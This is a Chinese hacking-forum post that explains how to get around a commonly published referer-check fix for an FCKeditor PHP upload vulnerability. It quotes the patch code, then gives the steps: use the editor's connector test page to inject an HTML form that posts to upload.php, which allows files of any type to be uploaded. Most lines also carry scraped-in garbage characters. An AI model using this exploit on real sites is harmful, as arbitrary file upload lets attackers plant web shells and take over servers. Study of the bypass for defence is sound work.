找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2233|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php: w* A" i& v7 S( `; @5 j
网上给出的修复方案是
9 V2 I% t; y4 }8 v修复方法,删除FCK编辑器用其他的编辑器
4 H2 h6 G0 _& Q/ Q9 n或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
; X4 @0 E6 S8 M% |  K& K, t4 x7 m8 n) R3 L
require(‘config.php’);
+ z! P) F% q5 P4 Hrequire(‘util.php’);% y! M% E% a2 t" k# F- ^: U
的下面添加以下代码—————————–
, o' o" w# d+ ]7 y" G3 G; S( Y; Z& r//防止外部提交6 {8 q' k( x- ?1 Q
function outsidepost()4 Y  n0 v/ m/ E& B# o/ J  O  j
{
6 s$ R1 p" \% D1 Z! m$servername=$_SERVER['SERVER_NAME'];
: l" N6 ^8 z1 x$ r' \$sub_from=@$_SERVER['HTTP_REFERER'];
7 C7 V7 n, L# g; I$sub_len=strlen($servername);
) o# K8 o1 z, v% r9 t9 X5 p% H$ q$checkfrom=substr($sub_from,7,$sub_len);3 k- B) P" n4 r" y- o) G/ h1 o% t
if($checkfrom!=$servername){8 c4 z" Z& t1 K1 `8 M* r. g* V
echo(“you don’t outsidepost!”);. k, C# \1 B) k- Y% e/ y
exit;
; q$ B( i  f; \" }8 T$ O% d$ Z3 i}
& `# s" G9 }0 }' E. T2 i}, W- |2 Z. @* {  C
outsidepost();
4 C* ~' p1 p; |; ~4 q/ `) }$ s防止外部提交,但是没有防止内部提交,( ?: i1 A; Z& ~+ R
利用方法:% g* e/ A6 P' z1 b  i* X, o6 _! @5 b
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
: B4 |2 V1 [: j7 ^  J2,在Current Folder 框输入0 N9 I  W, E, D( [7 Z! I+ z' F
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
" p5 C1 U& K( A6 T1 q1 t然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。( j5 {5 f+ e; V6 j* K! R; ]+ j
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表